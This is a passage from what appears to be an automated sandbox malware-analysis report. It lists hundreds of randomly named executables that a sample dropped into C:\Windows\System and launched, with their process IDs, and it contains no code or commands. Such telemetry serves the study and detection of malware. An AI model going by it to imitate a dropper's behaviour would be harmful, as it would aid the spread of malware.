- C:\Windows\System\KyfNGDT.exe
  C:\Windows\System\KyfNGDT.exe
  2⤵
  - Executes dropped EXE
  PID:3516
- C:\Windows\System\WhlxYxU.exe
  C:\Windows\System\WhlxYxU.exe
  2⤵
  - Executes dropped EXE
  PID:1684
- C:\Windows\System\xyMyQIb.exe
  C:\Windows\System\xyMyQIb.exe
  2⤵
  - Executes dropped EXE
  PID:3756
- C:\Windows\System\JmKRSlJ.exe
  C:\Windows\System\JmKRSlJ.exe
  2⤵
  - Executes dropped EXE
  PID:3888
- C:\Windows\System\yqsFoGZ.exe
  C:\Windows\System\yqsFoGZ.exe
  2⤵
  - Executes dropped EXE
  PID:2816
- C:\Windows\System\osEJKvn.exe
  C:\Windows\System\osEJKvn.exe
  2⤵
  - Executes dropped EXE
  PID:3096
- C:\Windows\System\kcXEibM.exe
  C:\Windows\System\kcXEibM.exe
  2⤵
  - Executes dropped EXE
  PID:2872
- C:\Windows\System\xzEhKBM.exe
  C:\Windows\System\xzEhKBM.exe
  2⤵
  - Executes dropped EXE
  PID:3240
- C:\Windows\System\pFcmVCQ.exe
  C:\Windows\System\pFcmVCQ.exe
  2⤵
  - Executes dropped EXE
  PID:2684
- C:\Windows\System\AtQWgTB.exe
  C:\Windows\System\AtQWgTB.exe
  2⤵
  - Executes dropped EXE
  PID:2464
- C:\Windows\System\qETcWqP.exe
  C:\Windows\System\qETcWqP.exe
  2⤵
  - Executes dropped EXE
  PID:3152
- C:\Windows\System\AwlkXAn.exe
  C:\Windows\System\AwlkXAn.exe
  2⤵
  - Executes dropped EXE
  PID:4460
- C:\Windows\System\EbNsKSU.exe
  C:\Windows\System\EbNsKSU.exe
  2⤵
  - Executes dropped EXE
  PID:4540
- C:\Windows\System\qJLhfFr.exe
  C:\Windows\System\qJLhfFr.exe
  2⤵
  - Executes dropped EXE
  PID:4644
- C:\Windows\System\EzedCEQ.exe
  C:\Windows\System\EzedCEQ.exe
  2⤵
  - Executes dropped EXE
  PID:3976
- C:\Windows\System\oKwGaro.exe
  C:\Windows\System\oKwGaro.exe
  2⤵
  - Executes dropped EXE
  PID:4424
- C:\Windows\System\FMrgNAF.exe
  C:\Windows\System\FMrgNAF.exe
  2⤵
  - Executes dropped EXE
  PID:3700
- C:\Windows\System\fcIZMWH.exe
  C:\Windows\System\fcIZMWH.exe
  2⤵
  - Executes dropped EXE
  PID:4900
- C:\Windows\System\narUNnS.exe
  C:\Windows\System\narUNnS.exe
  2⤵
  - Executes dropped EXE
  PID:4256
- C:\Windows\System\DBkvCcf.exe
  C:\Windows\System\DBkvCcf.exe
  2⤵
  - Executes dropped EXE
  PID:1988
- C:\Windows\System\zpgciNE.exe
  C:\Windows\System\zpgciNE.exe
  2⤵
  - Executes dropped EXE
  PID:4272
- C:\Windows\System\mHBpnxJ.exe
  C:\Windows\System\mHBpnxJ.exe
  2⤵
  - Executes dropped EXE
  PID:1360
- C:\Windows\System\wOcUrhN.exe
  C:\Windows\System\wOcUrhN.exe
  2⤵
  - Executes dropped EXE
  PID:4772
- C:\Windows\System\utyrfbf.exe
  C:\Windows\System\utyrfbf.exe
  2⤵
  - Executes dropped EXE
  PID:3180
- C:\Windows\System\HCEjWHm.exe
  C:\Windows\System\HCEjWHm.exe
  2⤵
  - Executes dropped EXE
  PID:4884
- C:\Windows\System\ElxQDwY.exe
  C:\Windows\System\ElxQDwY.exe
  2⤵
  - Executes dropped EXE
  PID:5008
- C:\Windows\System\BSPopbF.exe
  C:\Windows\System\BSPopbF.exe
  2⤵
  - Executes dropped EXE
  PID:2364
- C:\Windows\System\wVLhWjY.exe
  C:\Windows\System\wVLhWjY.exe
  2⤵
  - Executes dropped EXE
  PID:4168
- C:\Windows\System\wduscfZ.exe
  C:\Windows\System\wduscfZ.exe
  2⤵
  - Executes dropped EXE
  PID:3944
- C:\Windows\System\HxpMpJu.exe
  C:\Windows\System\HxpMpJu.exe
  2⤵
  - Executes dropped EXE
  PID:4908
- C:\Windows\System\uuRshnn.exe
  C:\Windows\System\uuRshnn.exe
  2⤵
  - Executes dropped EXE
  PID:1448
- C:\Windows\System\bgzCyFM.exe
  C:\Windows\System\bgzCyFM.exe
  2⤵
  - Executes dropped EXE
  PID:944
- C:\Windows\System\OPuPXyg.exe
  C:\Windows\System\OPuPXyg.exe
  2⤵
  - Executes dropped EXE
  PID:3520
- C:\Windows\System\SLAFgEv.exe
  C:\Windows\System\SLAFgEv.exe
  2⤵
  - Executes dropped EXE
  PID:4136
- C:\Windows\System\PhwXoQO.exe
  C:\Windows\System\PhwXoQO.exe
  2⤵
  - Executes dropped EXE
  PID:1952
- C:\Windows\System\wmJmzQS.exe
  C:\Windows\System\wmJmzQS.exe
  2⤵
  - Executes dropped EXE
  PID:4504
- C:\Windows\System\nXYFltc.exe
  C:\Windows\System\nXYFltc.exe
  2⤵
  - Executes dropped EXE
  PID:2444
- C:\Windows\System\AYsNsRv.exe
  C:\Windows\System\AYsNsRv.exe
  2⤵
  PID:1700
- C:\Windows\System\tqHOnpr.exe
  C:\Windows\System\tqHOnpr.exe
  2⤵
  PID:4912
- C:\Windows\System\GBNnAWA.exe
  C:\Windows\System\GBNnAWA.exe
  2⤵
  PID:884
- C:\Windows\System\BSgWxcq.exe
  C:\Windows\System\BSgWxcq.exe
  2⤵
  PID:4292
- C:\Windows\System\alHHjsH.exe
  C:\Windows\System\alHHjsH.exe
  2⤵
  PID:4412
- C:\Windows\System\fYgLPir.exe
  C:\Windows\System\fYgLPir.exe
  2⤵
  PID:3632
- C:\Windows\System\Srxktci.exe
  C:\Windows\System\Srxktci.exe
  2⤵
  PID:2456
- C:\Windows\System\TaOyLgV.exe
  C:\Windows\System\TaOyLgV.exe
  2⤵
  PID:1064
- C:\Windows\System\RPWfupi.exe
  C:\Windows\System\RPWfupi.exe
  2⤵
  PID:400
- C:\Windows\System\TmpFekQ.exe
  C:\Windows\System\TmpFekQ.exe
  2⤵
  PID:1424
- C:\Windows\System\DWDozfU.exe
  C:\Windows\System\DWDozfU.exe
  2⤵
  PID:1008
- C:\Windows\System\clPxbcY.exe
  C:\Windows\System\clPxbcY.exe
  2⤵
  PID:4336
- C:\Windows\System\ueaLwvK.exe
  C:\Windows\System\ueaLwvK.exe
  2⤵
  PID:1472
- C:\Windows\System\JkkdGYz.exe
  C:\Windows\System\JkkdGYz.exe
  2⤵
  PID:4752
- C:\Windows\System\QewGTBZ.exe
  C:\Windows\System\QewGTBZ.exe
  2⤵
  PID:4556
- C:\Windows\System\BIaHTfZ.exe
  C:\Windows\System\BIaHTfZ.exe
  2⤵
  PID:5132
- C:\Windows\System\LClacUY.exe
  C:\Windows\System\LClacUY.exe
  2⤵
  PID:5156
- C:\Windows\System\BhVCtWw.exe
  C:\Windows\System\BhVCtWw.exe
  2⤵
  PID:5184
- C:\Windows\System\sJYZUrA.exe
  C:\Windows\System\sJYZUrA.exe
  2⤵
  PID:5208
- C:\Windows\System\tAhtDnh.exe
  C:\Windows\System\tAhtDnh.exe
  2⤵
  PID:5240
- C:\Windows\System\fJNgZrj.exe
  C:\Windows\System\fJNgZrj.exe
  2⤵
  PID:5268
- C:\Windows\System\IGMbBRq.exe
  C:\Windows\System\IGMbBRq.exe
  2⤵
  PID:5296
- C:\Windows\System\CvmnXZx.exe
  C:\Windows\System\CvmnXZx.exe
  2⤵
  PID:5324
- C:\Windows\System\XOvOLkL.exe
  C:\Windows\System\XOvOLkL.exe
  2⤵
  PID:5356
- C:\Windows\System\rBBqVcJ.exe
  C:\Windows\System\rBBqVcJ.exe
  2⤵
  PID:5380
- C:\Windows\System\FtFGskw.exe
  C:\Windows\System\FtFGskw.exe
  2⤵
  PID:5408
- C:\Windows\System\xcXfyeQ.exe
  C:\Windows\System\xcXfyeQ.exe
  2⤵
  PID:5436
- C:\Windows\System\zyAyBSQ.exe
  C:\Windows\System\zyAyBSQ.exe
  2⤵
  PID:5460
- C:\Windows\System\kXinijf.exe
  C:\Windows\System\kXinijf.exe
  2⤵
  PID:5492
- C:\Windows\System\NkcZnDK.exe
  C:\Windows\System\NkcZnDK.exe
  2⤵
  PID:5520
- C:\Windows\System\GzFZvjp.exe
  C:\Windows\System\GzFZvjp.exe
  2⤵
  PID:5548
- C:\Windows\System\iOFomJv.exe
  C:\Windows\System\iOFomJv.exe
  2⤵
  PID:5576
- C:\Windows\System\rYhftmQ.exe
  C:\Windows\System\rYhftmQ.exe
  2⤵
  PID:5604
- C:\Windows\System\iTooolr.exe
  C:\Windows\System\iTooolr.exe
  2⤵
  PID:5640
- C:\Windows\System\uPsBflG.exe
  C:\Windows\System\uPsBflG.exe
  2⤵
  PID:5660
- C:\Windows\System\NchABRt.exe
  C:\Windows\System\NchABRt.exe
  2⤵
  PID:5688
- C:\Windows\System\LbxQGfl.exe
  C:\Windows\System\LbxQGfl.exe
  2⤵
  PID:5716
- C:\Windows\System\MpOYAyF.exe
  C:\Windows\System\MpOYAyF.exe
  2⤵
  PID:5744
- C:\Windows\System\fBqSjDN.exe
  C:\Windows\System\fBqSjDN.exe
  2⤵
  PID:5772
- C:\Windows\System\JbtyLai.exe
  C:\Windows\System\JbtyLai.exe
  2⤵
  PID:5800
- C:\Windows\System\ULskPFb.exe
  C:\Windows\System\ULskPFb.exe
  2⤵
  PID:5828
- C:\Windows\System\HdXhgjL.exe
  C:\Windows\System\HdXhgjL.exe
  2⤵
  PID:5856
- C:\Windows\System\kZhyQAQ.exe
  C:\Windows\System\kZhyQAQ.exe
  2⤵
  PID:5884
- C:\Windows\System\laISobn.exe
  C:\Windows\System\laISobn.exe
  2⤵
  PID:5912
- C:\Windows\System\topxJuL.exe
  C:\Windows\System\topxJuL.exe
  2⤵
  PID:5940
- C:\Windows\System\AcEUgmv.exe
  C:\Windows\System\AcEUgmv.exe
  2⤵
  PID:6000
- C:\Windows\System\HGTUCwP.exe
  C:\Windows\System\HGTUCwP.exe
  2⤵
  PID:6020
- C:\Windows\System\RzzgugB.exe
  C:\Windows\System\RzzgugB.exe
  2⤵
  PID:6036
- C:\Windows\System\GUwKvNv.exe
  C:\Windows\System\GUwKvNv.exe
  2⤵
  PID:6060
- C:\Windows\System\zFkVavj.exe
  C:\Windows\System\zFkVavj.exe
  2⤵
  PID:6080
- C:\Windows\System\nfyqoAO.exe
  C:\Windows\System\nfyqoAO.exe
  2⤵
  PID:6104
- C:\Windows\System\KBdmJEf.exe
  C:\Windows\System\KBdmJEf.exe
  2⤵
  PID:6132
- C:\Windows\System\EWIdZyN.exe
  C:\Windows\System\EWIdZyN.exe
  2⤵
  PID:2356
- C:\Windows\System\AlDawkx.exe
  C:\Windows\System\AlDawkx.exe
  2⤵
  PID:4408
- C:\Windows\System\EIvWhUR.exe
  C:\Windows\System\EIvWhUR.exe
  2⤵
  PID:3564
- C:\Windows\System\LKtYLCy.exe
  C:\Windows\System\LKtYLCy.exe
  2⤵
  PID:4000
- C:\Windows\System\vWhLEmR.exe
  C:\Windows\System\vWhLEmR.exe
  2⤵
  PID:5172
- C:\Windows\System\DrNmRuW.exe
  C:\Windows\System\DrNmRuW.exe
  2⤵
  PID:5228
- C:\Windows\System\BdsIruw.exe
  C:\Windows\System\BdsIruw.exe
  2⤵
  PID:5288
- C:\Windows\System\tnjIkKe.exe
  C:\Windows\System\tnjIkKe.exe
  2⤵
  PID:3100
- C:\Windows\System\wEEqTCD.exe
  C:\Windows\System\wEEqTCD.exe
  2⤵
  PID:5396
- C:\Windows\System\hXsedgC.exe
  C:\Windows\System\hXsedgC.exe
  2⤵
  PID:2120
- C:\Windows\System\MdJxIWN.exe
  C:\Windows\System\MdJxIWN.exe
  2⤵
  PID:5512
- C:\Windows\System\xoNlaSX.exe
  C:\Windows\System\xoNlaSX.exe
  2⤵
  PID:5568
- C:\Windows\System\CJPTTjG.exe
  C:\Windows\System\CJPTTjG.exe
  2⤵
  PID:3212
- C:\Windows\System\bYfNmTi.exe
  C:\Windows\System\bYfNmTi.exe
  2⤵
  PID:5872
- C:\Windows\System\AgkfPPG.exe
  C:\Windows\System\AgkfPPG.exe
  2⤵
  PID:3496
- C:\Windows\System\RruuFCF.exe
  C:\Windows\System\RruuFCF.exe
  2⤵
  PID:5996
- C:\Windows\System\MoMLsms.exe
  C:\Windows\System\MoMLsms.exe
  2⤵
  PID:6048
- C:\Windows\System\IPBdCls.exe
  C:\Windows\System\IPBdCls.exe
  2⤵
  PID:4820
- C:\Windows\System\CrmbMwh.exe
  C:\Windows\System\CrmbMwh.exe
  2⤵
  PID:2376
- C:\Windows\System\dGRBeoC.exe
  C:\Windows\System\dGRBeoC.exe
  2⤵
  PID:3960
- C:\Windows\System\gljjdtf.exe
  C:\Windows\System\gljjdtf.exe
  2⤵
  PID:2428
- C:\Windows\System\oynqrtR.exe
  C:\Windows\System\oynqrtR.exe
  2⤵
  PID:5260
- C:\Windows\System\JetKxmB.exe
  C:\Windows\System\JetKxmB.exe
  2⤵
  PID:5340
- C:\Windows\System\WSRosYH.exe
  C:\Windows\System\WSRosYH.exe
  2⤵
  PID:5392
- C:\Windows\System\YZWDnOn.exe
  C:\Windows\System\YZWDnOn.exe
  2⤵
  PID:1536
- C:\Windows\System\vHNRbUd.exe
  C:\Windows\System\vHNRbUd.exe
  2⤵
  PID:5560
- C:\Windows\System\nRweLpE.exe
  C:\Windows\System\nRweLpE.exe
  2⤵
  PID:5504
- C:\Windows\System\NfDtbgM.exe
  C:\Windows\System\NfDtbgM.exe
  2⤵
  PID:5480
- C:\Windows\System\eiNFkfC.exe
  C:\Windows\System\eiNFkfC.exe
  2⤵
  PID:2392
- C:\Windows\System\IHTOiLm.exe
  C:\Windows\System\IHTOiLm.exe
  2⤵
  PID:5620
- C:\Windows\System\picMCpf.exe
  C:\Windows\System\picMCpf.exe
  2⤵
  PID:4492
- C:\Windows\System\MhnJKjB.exe
  C:\Windows\System\MhnJKjB.exe
  2⤵
  PID:4572
- C:\Windows\System\xbUHPLn.exe
  C:\Windows\System\xbUHPLn.exe
  2⤵
  PID:5972
- C:\Windows\System\arqcRBt.exe
  C:\Windows\System\arqcRBt.exe
  2⤵
  PID:5732
- C:\Windows\System\fnGEgvQ.exe
  C:\Windows\System\fnGEgvQ.exe
  2⤵
  PID:2660
- C:\Windows\System\SewKvzr.exe
  C:\Windows\System\SewKvzr.exe
  2⤵
  PID:5924
- C:\Windows\System\NiYZWiG.exe
  C:\Windows\System\NiYZWiG.exe
  2⤵
  PID:3156
- C:\Windows\System\BbmpDdJ.exe
  C:\Windows\System\BbmpDdJ.exe
  2⤵
  PID:5284
- C:\Windows\System\miMCuVG.exe
  C:\Windows\System\miMCuVG.exe
  2⤵
  PID:5424
- C:\Windows\System\buQkArO.exe
  C:\Windows\System\buQkArO.exe
  2⤵
  PID:4592
- C:\Windows\System\brBLHxH.exe
  C:\Windows\System\brBLHxH.exe
  2⤵
  PID:4984
- C:\Windows\System\gecsKln.exe
  C:\Windows\System\gecsKln.exe
  2⤵
  PID:2248
- C:\Windows\System\GUPrgwu.exe
  C:\Windows\System\GUPrgwu.exe
  2⤵
  PID:5868
- C:\Windows\System\idrGCII.exe
  C:\Windows\System\idrGCII.exe
  2⤵
  PID:6072
- C:\Windows\System\dDRXhke.exe
  C:\Windows\System\dDRXhke.exe
  2⤵
  PID:6028
- C:\Windows\System\EgnnFHu.exe
  C:\Windows\System\EgnnFHu.exe
  2⤵
  PID:4924
- C:\Windows\System\ZESZXes.exe
  C:\Windows\System\ZESZXes.exe
  2⤵
  PID:5536
- C:\Windows\System\EPFquOj.exe
  C:\Windows\System\EPFquOj.exe
  2⤵
  PID:6164
- C:\Windows\System\YTMIKGR.exe
  C:\Windows\System\YTMIKGR.exe
  2⤵
  PID:6184
- C:\Windows\System\pOYcvMU.exe
  C:\Windows\System\pOYcvMU.exe
  2⤵
  PID:6216
- C:\Windows\System\AeyBEIB.exe
  C:\Windows\System\AeyBEIB.exe
  2⤵
  PID:6232
- C:\Windows\System\iyjQDuz.exe
  C:\Windows\System\iyjQDuz.exe
  2⤵
  PID:6252
- C:\Windows\System\xZcocKZ.exe
  C:\Windows\System\xZcocKZ.exe
  2⤵
  PID:6284
- C:\Windows\System\DKOEMeW.exe
  C:\Windows\System\DKOEMeW.exe
  2⤵
  PID:6340
- C:\Windows\System\KSZFtBY.exe
  C:\Windows\System\KSZFtBY.exe
  2⤵
  PID:6372
- C:\Windows\System\lfyRzTH.exe
  C:\Windows\System\lfyRzTH.exe
  2⤵
  PID:6396
- C:\Windows\System\PGUBeho.exe
  C:\Windows\System\PGUBeho.exe
  2⤵
  PID:6456
- C:\Windows\System\zrZpnTN.exe
  C:\Windows\System\zrZpnTN.exe
  2⤵
  PID:6480
- C:\Windows\System\NcRuzHJ.exe
  C:\Windows\System\NcRuzHJ.exe
  2⤵
  PID:6496
- C:\Windows\System\TXVbZXe.exe
  C:\Windows\System\TXVbZXe.exe
  2⤵
  PID:6520
- C:\Windows\System\kiKIkfI.exe
  C:\Windows\System\kiKIkfI.exe
  2⤵
  PID:6540
- C:\Windows\System\nvNNkkt.exe
  C:\Windows\System\nvNNkkt.exe
  2⤵
  PID:6560
- C:\Windows\System\ZvgcLFo.exe
  C:\Windows\System\ZvgcLFo.exe
  2⤵
  PID:6580
- C:\Windows\System\HkNdZMO.exe
  C:\Windows\System\HkNdZMO.exe
  2⤵
  PID:6632
- C:\Windows\System\IJseSXD.exe
  C:\Windows\System\IJseSXD.exe
  2⤵
  PID:6700
- C:\Windows\System\pwUVxfP.exe
  C:\Windows\System\pwUVxfP.exe
  2⤵
  PID:6720
- C:\Windows\System\bAiVAOA.exe
  C:\Windows\System\bAiVAOA.exe
  2⤵
  PID:6756
- C:\Windows\System\pJlbAdK.exe
  C:\Windows\System\pJlbAdK.exe
  2⤵
  PID:6780
- C:\Windows\System\xXoPDlz.exe
  C:\Windows\System\xXoPDlz.exe
  2⤵
  PID:6804
- C:\Windows\System\pFAXESd.exe
  C:\Windows\System\pFAXESd.exe
  2⤵
  PID:6824
- C:\Windows\System\pHfdDrv.exe
  C:\Windows\System\pHfdDrv.exe
  2⤵
  PID:6848
- C:\Windows\System\CkjnCMx.exe
  C:\Windows\System\CkjnCMx.exe
  2⤵
  PID:6864
- C:\Windows\System\AzlqZle.exe
  C:\Windows\System\AzlqZle.exe
  2⤵
  PID:6888
- C:\Windows\System\SBYGunU.exe
  C:\Windows\System\SBYGunU.exe
  2⤵
  PID:6940
- C:\Windows\System\fZFOhVd.exe
  C:\Windows\System\fZFOhVd.exe
  2⤵
  PID:6964
- C:\Windows\System\DQEZePa.exe
  C:\Windows\System\DQEZePa.exe
  2⤵
  PID:7012
- C:\Windows\System\fytFbEn.exe
  C:\Windows\System\fytFbEn.exe
  2⤵
  PID:7036
- C:\Windows\System\tgkoAaw.exe
  C:\Windows\System\tgkoAaw.exe
  2⤵
  PID:7068
- C:\Windows\System\SJFCYrD.exe
  C:\Windows\System\SJFCYrD.exe
  2⤵
  PID:7120
- C:\Windows\System\DsAYrCu.exe
  C:\Windows\System\DsAYrCu.exe
  2⤵
  PID:7136
- C:\Windows\System\epERcku.exe
  C:\Windows\System\epERcku.exe
  2⤵
  PID:7160
- C:\Windows\System\QellBKq.exe
  C:\Windows\System\QellBKq.exe
  2⤵
  PID:60
- C:\Windows\System\JEyHgid.exe
  C:\Windows\System\JEyHgid.exe
  2⤵
  PID:1996
- C:\Windows\System\XDdKvsX.exe
  C:\Windows\System\XDdKvsX.exe
  2⤵
  PID:6228
- C:\Windows\System\vgGQYIi.exe
  C:\Windows\System\vgGQYIi.exe
  2⤵
  PID:6264
- C:\Windows\System\KcDXGPG.exe
  C:\Windows\System\KcDXGPG.exe
  2⤵
  PID:6368
- C:\Windows\System\ZEhmphH.exe
  C:\Windows\System\ZEhmphH.exe
  2⤵
  PID:6408
- C:\Windows\System\KAWDulv.exe
  C:\Windows\System\KAWDulv.exe
  2⤵
  PID:6472
- C:\Windows\System\ujYGlWT.exe
  C:\Windows\System\ujYGlWT.exe
  2⤵
  PID:6504
- C:\Windows\System\zGSWgnE.exe
  C:\Windows\System\zGSWgnE.exe
  2⤵
  PID:6508
- C:\Windows\System\pJQSYrV.exe
  C:\Windows\System\pJQSYrV.exe
  2⤵
  PID:6640
- C:\Windows\System\icVuplz.exe
  C:\Windows\System\icVuplz.exe
  2⤵
  PID:6552
- C:\Windows\System\opxmJIN.exe
  C:\Windows\System\opxmJIN.exe
  2⤵
  PID:6620
- C:\Windows\System\DQHFZZn.exe
  C:\Windows\System\DQHFZZn.exe
  2⤵
  PID:6860
- C:\Windows\System\HlQqLOq.exe
  C:\Windows\System\HlQqLOq.exe
  2⤵
  PID:6924
- C:\Windows\System\katnDOu.exe
  C:\Windows\System\katnDOu.exe
  2⤵
  PID:6936
- C:\Windows\System\gIFdfLW.exe
  C:\Windows\System\gIFdfLW.exe
  2⤵
  PID:7128
- C:\Windows\System\uYgOGqB.exe
  C:\Windows\System\uYgOGqB.exe
  2⤵
  PID:4976
- C:\Windows\System\QLpbqWD.exe
  C:\Windows\System\QLpbqWD.exe
  2⤵
  PID:6212
- C:\Windows\System\lsTACar.exe
  C:\Windows\System\lsTACar.exe
  2⤵
  PID:6420
- C:\Windows\System\EYHFXGc.exe
  C:\Windows\System\EYHFXGc.exe
  2⤵
  PID:6392
- C:\Windows\System\hWxYNby.exe
  C:\Windows\System\hWxYNby.exe
  2⤵
  PID:6492
- C:\Windows\System\chYxOAr.exe
  C:\Windows\System\chYxOAr.exe
  2⤵
  PID:6668
- C:\Windows\System\ZjETxyC.exe
  C:\Windows\System\ZjETxyC.exe
  2⤵
  PID:6832
- C:\Windows\System\aFRjSAR.exe
  C:\Windows\System\aFRjSAR.exe
  2⤵
  PID:6932
- C:\Windows\System\SIYMakp.exe
  C:\Windows\System\SIYMakp.exe
  2⤵
  PID:7020
- C:\Windows\System\YuBaaed.exe
  C:\Windows\System\YuBaaed.exe
  2⤵
  PID:7144
- C:\Windows\System\jBKydXI.exe
  C:\Windows\System\jBKydXI.exe
  2⤵
  PID:6244
- C:\Windows\System\NzVYVnl.exe
  C:\Windows\System\NzVYVnl.exe
  2⤵
  PID:6532
- C:\Windows\System\XfnVAyI.exe
  C:\Windows\System\XfnVAyI.exe
  2⤵
  PID:6388
- C:\Windows\System\ogdzuSR.exe
  C:\Windows\System\ogdzuSR.exe
  2⤵
  PID:7052
- C:\Windows\System\BWNGDNz.exe
  C:\Windows\System\BWNGDNz.exe
  2⤵
  PID:7188
- C:\Windows\System\clUEVqg.exe
  C:\Windows\System\clUEVqg.exe
  2⤵
  PID:7208
- C:\Windows\System\cYySbkh.exe
  C:\Windows\System\cYySbkh.exe
  2⤵
  PID:7232
- C:\Windows\System\QWKFuTq.exe
  C:\Windows\System\QWKFuTq.exe
  2⤵
  PID:7268
- C:\Windows\System\hKTphPk.exe
  C:\Windows\System\hKTphPk.exe
  2⤵
  PID:7320
- C:\Windows\System\RQbqmql.exe
  C:\Windows\System\RQbqmql.exe
  2⤵
  PID:7344
- C:\Windows\System\XVqaCqc.exe
  C:\Windows\System\XVqaCqc.exe
  2⤵
  PID:7408
- C:\Windows\System\zJBTNyj.exe
  C:\Windows\System\zJBTNyj.exe
  2⤵
  PID:7436
- C:\Windows\System\LhXaEuE.exe
  C:\Windows\System\LhXaEuE.exe
  2⤵
  PID:7460
- C:\Windows\System\xblLBxX.exe
  C:\Windows\System\xblLBxX.exe
  2⤵
  PID:7480
- C:\Windows\System\sGlubul.exe
  C:\Windows\System\sGlubul.exe
  2⤵
  PID:7496
- C:\Windows\System\eNbFMoE.exe
  C:\Windows\System\eNbFMoE.exe
  2⤵
  PID:7528
- C:\Windows\System\mxcKmiu.exe
  C:\Windows\System\mxcKmiu.exe
  2⤵
  PID:7548
- C:\Windows\System\FvkbdTC.exe
  C:\Windows\System\FvkbdTC.exe
  2⤵
  PID:7572
- C:\Windows\System\OmgsxZe.exe
  C:\Windows\System\OmgsxZe.exe
  2⤵
  PID:7592
- C:\Windows\System\TlIKKHr.exe
  C:\Windows\System\TlIKKHr.exe
  2⤵
  PID:7616
- C:\Windows\System\HEQtCWa.exe
  C:\Windows\System\HEQtCWa.exe
  2⤵
  PID:7636
- C:\Windows\System\RfRZWNw.exe
  C:\Windows\System\RfRZWNw.exe
  2⤵
  PID:7656
- C:\Windows\System\xPjhZjG.exe
  C:\Windows\System\xPjhZjG.exe
  2⤵
  PID:7676
- C:\Windows\System\tclIcXB.exe
  C:\Windows\System\tclIcXB.exe
  2⤵
  PID:7696
- C:\Windows\System\dDPxgIu.exe
  C:\Windows\System\dDPxgIu.exe
  2⤵
  PID:7720
- C:\Windows\System\iISIjyi.exe
  C:\Windows\System\iISIjyi.exe
  2⤵
  PID:7740
- C:\Windows\System\nqffZVo.exe
  C:\Windows\System\nqffZVo.exe
  2⤵
  PID:7768
- C:\Windows\System\YIfhagq.exe
  C:\Windows\System\YIfhagq.exe
  2⤵
  PID:7832
- C:\Windows\System\hUPuksO.exe
  C:\Windows\System\hUPuksO.exe
  2⤵
  PID:7860
- C:\Windows\System\jkkCurB.exe
  C:\Windows\System\jkkCurB.exe
  2⤵
  PID:7888
- C:\Windows\System\xPwrpgL.exe
  C:\Windows\System\xPwrpgL.exe
  2⤵
  PID:7916
- C:\Windows\System\xABzsXy.exe
  C:\Windows\System\xABzsXy.exe
  2⤵
  PID:7960
- C:\Windows\System\WxNvgQU.exe
  C:\Windows\System\WxNvgQU.exe
  2⤵
  PID:8020
- C:\Windows\System\TgHwvCZ.exe
  C:\Windows\System\TgHwvCZ.exe
  2⤵
  PID:8052
- C:\Windows\System\lmECcce.exe
  C:\Windows\System\lmECcce.exe
  2⤵
  PID:8076
- C:\Windows\System\hTjggbp.exe
  C:\Windows\System\hTjggbp.exe
  2⤵
  PID:8116
- C:\Windows\System\cWCCQYN.exe
  C:\Windows\System\cWCCQYN.exe
  2⤵
  PID:8136
- C:\Windows\System\SoZeiKf.exe
  C:\Windows\System\SoZeiKf.exe
  2⤵
  PID:8160
- C:\Windows\System\XmsRJuO.exe
  C:\Windows\System\XmsRJuO.exe
  2⤵
  PID:8176
- C:\Windows\System\ipeXYeb.exe
  C:\Windows\System\ipeXYeb.exe
  2⤵
  PID:7204
- C:\Windows\System\RrofLxw.exe
  C:\Windows\System\RrofLxw.exe
  2⤵
  PID:7176
- C:\Windows\System\rGSakIu.exe
  C:\Windows\System\rGSakIu.exe
  2⤵
  PID:7228
- C:\Windows\System\JkQbgFi.exe
  C:\Windows\System\JkQbgFi.exe
  2⤵
  PID:7396
- C:\Windows\System\hBGmIsU.exe
  C:\Windows\System\hBGmIsU.exe
  2⤵
  PID:7472
- C:\Windows\System\SFbcUpO.exe
  C:\Windows\System\SFbcUpO.exe
  2⤵
  PID:7504
- C:\Windows\System\hPfEduS.exe
  C:\Windows\System\hPfEduS.exe
  2⤵
  PID:7588
- C:\Windows\System\OdfxXrc.exe
  C:\Windows\System\OdfxXrc.exe
  2⤵
  PID:7540
- C:\Windows\System\BckIVXb.exe
  C:\Windows\System\BckIVXb.exe
  2⤵
  PID:7672
- C:\Windows\System\Xvdzauh.exe
  C:\Windows\System\Xvdzauh.exe
  2⤵
  PID:7732
- C:\Windows\System\gxVLXjG.exe
  C:\Windows\System\gxVLXjG.exe
  2⤵
  PID:7800
- C:\Windows\System\kahsbmo.exe
  C:\Windows\System\kahsbmo.exe
  2⤵
  PID:7924
- C:\Windows\System\RWvDbrY.exe
  C:\Windows\System\RWvDbrY.exe
  2⤵
  PID:7848
- C:\Windows\System\cwvyQvW.exe
  C:\Windows\System\cwvyQvW.exe
  2⤵
  PID:7996
- C:\Windows\System\LjkOmXt.exe
  C:\Windows\System\LjkOmXt.exe
  2⤵
  PID:8012
- C:\Windows\System\apGkXCr.exe
  C:\Windows\System\apGkXCr.exe
  2⤵
  PID:8072
- C:\Windows\System\PzEEEYh.exe
  C:\Windows\System\PzEEEYh.exe
  2⤵
  PID:8152
- C:\Windows\System\FVQZvxa.exe
  C:\Windows\System\FVQZvxa.exe
  2⤵
  PID:7264
- C:\Windows\System\vxJzJNE.exe
  C:\Windows\System\vxJzJNE.exe
  2⤵
  PID:6796
- C:\Windows\System\dYmaelW.exe
  C:\Windows\System\dYmaelW.exe
  2⤵
  PID:7488
- C:\Windows\System\yLFWHkI.exe
  C:\Windows\System\yLFWHkI.exe
  2⤵
  PID:7668
- C:\Windows\System\urcYxrc.exe
  C:\Windows\System\urcYxrc.exe
  2⤵
  PID:8044
- C:\Windows\System\iFDqsPg.exe
  C:\Windows\System\iFDqsPg.exe
  2⤵
  PID:7876
- C:\Windows\System\LajGeeN.exe
  C:\Windows\System\LajGeeN.exe
  2⤵
  PID:8124
- C:\Windows\System\VESiJTl.exe
  C:\Windows\System\VESiJTl.exe
  2⤵
  PID:7116
- C:\Windows\System\ZEbGruB.exe
  C:\Windows\System\ZEbGruB.exe
  2⤵
  PID:8040
- C:\Windows\System\sOJiylH.exe
  C:\Windows\System\sOJiylH.exe
  2⤵
  PID:8132
- C:\Windows\System\SoNiVMa.exe
  C:\Windows\System\SoNiVMa.exe
  2⤵
  PID:8208
- C:\Windows\System\beWpLfG.exe
  C:\Windows\System\beWpLfG.exe
  2⤵
  PID:8232
- C:\Windows\System\pGwAZmt.exe
  C:\Windows\System\pGwAZmt.exe
  2⤵
  PID:8256
- C:\Windows\System\mderbKq.exe
  C:\Windows\System\mderbKq.exe
  2⤵
  PID:8280
- C:\Windows\System\iJwlQPI.exe
  C:\Windows\System\iJwlQPI.exe
  2⤵
  PID:8304
- C:\Windows\System\yHqeBAF.exe
  C:\Windows\System\yHqeBAF.exe
  2⤵
  PID:8320
- C:\Windows\System\UpoGmHU.exe
